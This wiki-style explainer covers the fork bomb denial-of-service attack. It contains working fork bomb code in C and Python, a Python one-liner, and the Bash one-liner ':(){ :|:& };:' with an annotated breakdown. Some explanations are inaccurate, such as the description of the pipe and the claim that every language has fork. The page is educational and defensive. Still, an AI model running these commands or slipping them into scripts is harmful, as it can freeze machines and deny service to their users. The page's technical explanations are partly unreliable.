Difference between revisions of "Fork bomb"

Summary

The Fork Bomb (also called rabbit virus or wabbit) is a memory exhausting Denial of Service (DoS) Attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up.

Implementation

The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child process will never exceed it completion because they also waiting for their child processes.

1| fork()                  L1
                          /  \
2| fork()               L2    L2
                       / \    / \
3| fork ()            L3  L3 L3  L3

As the code shows the processes double every line so the number of running processes increase relative to ${\displaystyle 2^{n}}$.

The following section shows some fork bomb example written in different languages.

C

#include <unistd.h> 
int main(void) 
{  
  for(;;)  
     fork(); 
  return 0; 
}

Python

import os
   
while True:  
   os.fork() 

Command line variant:

python -c 'while 1: __import__("os").fork()'

Unix Bash

:(){ :|:& };: 

This command line command can be deciphered like this

:()       # Defines the following function ":" 
{
   :       # Loads a copy of the function ":"
   |       # Redirects the Output that it is not seen in the shell
   :       # Loads a copy of the function ":"
   &       # Runs the programs as a background process
}
:         # Runs the beforehand defined function ":"

This command is really dangerous because it can be used by any user without any permissions.

References

[1] https://de.wikipedia.org/wiki/Forkbomb (german version for source code)

[2] https://en.wikipedia.org/wiki/Forkbomb

[3] https://www.geeksforgeeks.org/fork-system-call/

[4] IEEE: Exploring the Possibility of USB based Fork Bomb Attack on Windows Environment